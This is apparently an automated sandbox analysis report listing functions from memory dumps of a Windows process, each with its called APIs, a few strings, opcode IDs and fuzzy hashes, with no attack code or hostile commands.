                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                        • Instruction ID: 82d12ce4bf942a1684c69ba2ab26bc134c6926f5cfbca28edf2385294d2a7428
                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                        • Instruction Fuzzy Hash: DB11E253609741C6EB2ACF71A819379B6A0EF49B99F498132DD0D87790DF3DE049C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                        • API String ID: 3677997916-3870813718
                                                                                                                                                                        • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                        • Instruction ID: 2a179098f972559df3e76f6b874514237c5ca4c86bcdb1d0801a43e2f60cb95e
                                                                                                                                                                        • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                        • Instruction Fuzzy Hash: 11110A77619A41C7EB108F50E44466ABBA4FB89764F404235DA8D83B68EF7ED048CB05
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcsrchr$wcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 110935159-0
                                                                                                                                                                        • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                                                                        • Instruction ID: 92069aedca4fadfed99c6b0a2a026f11962edcaf8bb5eba8e0398b81924bf236
                                                                                                                                                                        • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B518D23B19786C5FA219F6198147F96290FF49BA4F084631CE5E8B784EE3DE54AC306
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                                                                        • Instruction ID: b3fa9b21cb5155f41ee51955f32ccf242236cfbbf832bdeb7c7a47d0c483f8a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C51A027A09682C5EB25DF3098097BA77B0FF49B58F458135CA0D87694EE3ED54CC70A

APIs
• memset.MSVCRT ref: 00007FF6E942921C
• ??_V@YAXPEAX@Z.MSVCRT (MSVC-decorated name for operator delete[](void*)) ref: 00007FF6E94293AA
  • Part of subcall function 00007FF6E9428B20: wcsrchr.MSVCRT ref: 00007FF6E9428BAB
  • Part of subcall function 00007FF6E9428B20: _wcsicmp.MSVCRT ref: 00007FF6E9428BD4
  • Part of subcall function 00007FF6E9428B20: _wcsicmp.MSVCRT ref: 00007FF6E9428BF2
  • Part of subcall function 00007FF6E9428B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9428C16
  • Part of subcall function 00007FF6E9428B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E9428C2F
  • Part of subcall function 00007FF6E9428B20: wcschr.MSVCRT ref: 00007FF6E9428CB3
  • Part of subcall function 00007FF6E943417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E94341AD
  • Part of subcall function 00007FF6E9433060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6E94292AC), ref: 00007FF6E94330CA
  • Part of subcall function 00007FF6E9433060: SetErrorMode.KERNELBASE ref: 00007FF6E94330DD
  • Part of subcall function 00007FF6E9433060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E94330F6
  • Part of subcall function 00007FF6E9433060: SetErrorMode.KERNELBASE ref: 00007FF6E9433106
• wcsrchr.MSVCRT ref: 00007FF6E94292D8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9429362
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E9429373
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
• String ID:
• API String ID: 3966000956-0
• Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
• Instruction ID: 36316a92a970b7a5d8276705fd1eebb791a776ba8f34d9c6deee42020b136fe4
• Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
• Instruction Fuzzy Hash: 8051AA33A09A82C6EB618F21D9503B963A0FF49B84F148435DA4DC7B95DF3EE559C30A

APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$_setjmp
• String ID:
• API String ID: 3883041866-0
• Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
• Instruction ID: 19f5fd1055bc18bcfa38f433dc423980298e2d5f552e22fad0962a5a83bc6376
• Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
• Instruction Fuzzy Hash: 7A515672A08B86CAEB65CF21E8503E977A4FB49748F404135EA4DCBA48DF3DD648CB05

APIs
• _wcsicmp.MSVCRT ref: 00007FF6E942B4BD
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
• _wcsicmp.MSVCRT ref: 00007FF6E942B518
• _wcsicmp.MSVCRT ref: 00007FF6E942B58B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: ELSE$IF/?
• API String ID: 3223794493-1134991328
• Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
• Instruction ID: 6ee8fec59c18a01561a81e758a6a8b5a15422c8779968c98e89cf99dba3d1598
• Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
• Instruction Fuzzy Hash: 21414523E0D647C2FB58AF74A4153B922A5BF45784F544439D90ECB396EE3EE448C30A

APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$File_get_osfhandle$PointerReadlongjmp
• String ID:
• API String ID: 1532185241-0
• Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction ID: 38f86971cb9c174610f9835d657f42aed53715c9c406710c3adc4fa41e4938fd
• Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
• Instruction Fuzzy Hash: DC419A33A04751CBE7249F21A44167EAAA1FF88B80F454535EA0A83785CF3EE84ACB45

APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ErrorFileLast$DeleteRead_get_osfhandle
• String ID:
• API String ID: 3588551418-0
• Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction ID: b692a30e48002c2f70d2a6037bb799864b4e091259ed0ecf0f0ed70cbfc91bf1
• Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
• Instruction Fuzzy Hash: 0A41A073A18242CBE7249F51A84037DB6A1FF85B81F144139DA0EC7791DE3EE849CB4A

APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ErrorModememset$FullNamePath_wcsicmp
• String ID:
• API String ID: 2123716050-0
• Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction ID: 6a74fab02a1f0d28e1f356b3ed3f6fe3f1767ec2acd278ce82177189d1a1a94e
• Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction Fuzzy Hash: 47418933709AC2CAEB768F21D8543E927A4EF49B88F444134DA4D8AA98DE3DD249C705
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3114114779-0
                                                                                                                                                                        • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                        • Instruction ID: 96b4062202b103e94c46b2104182f971b8e32c1c7b20c4d1c39be0c70a7ee814
                                                                                                                                                                        • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                        • Instruction Fuzzy Hash: 22410333A09A46CAE7008F65E4403AC3BA5FB88B48F544136EA0ED3B54DF39E41AC745
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A77A
                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A7AF
                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A80E
                                                                                                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A839
                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A850
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2240656346-0
                                                                                                                                                                        • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                        • Instruction ID: e16199ceed87be875e71b6cb14246c44dcec4a224bfb29eacde6037902123b6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                        • Instruction Fuzzy Hash: CD31AE33A18A51D2E7108F14E440679B6E4FF88790F944034EA4E83764EF3ED85ACF06
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E944D0F9
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6E944D10F
                                                                                                                                                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6E944D166
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E944D17A
                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6E944D18C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3008996577-0
                                                                                                                                                                        • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                        • Instruction ID: d011fbfc65ada489dd715ca07d9616cf51d1639f2834147b5115236db0190556
                                                                                                                                                                        • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F212926B14A51CAE7009FB1E8001BD77B0FF4DB49B445225EE4D93B98DF39D049CB19
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateSemaphore
                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                        • API String ID: 1078844751-1814513734
                                                                                                                                                                        • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                        • Instruction ID: 1f731e7d42db2951187d2f4fd287ad428ec6da8aacc2ea148c69545d9b6e5f5e
                                                                                                                                                                        • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                        • Instruction Fuzzy Hash: A251D663B29782C6EF219F5484547BD6290EF84B90F544435DA0D87785EF3EE41ECB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6E944B934
                                                                                                                                                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E9435085), ref: 00007FF6E944B9A5
                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6E9435085), ref: 00007FF6E944B9F7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                        • String ID: %WINDOWS_COPYRIGHT%
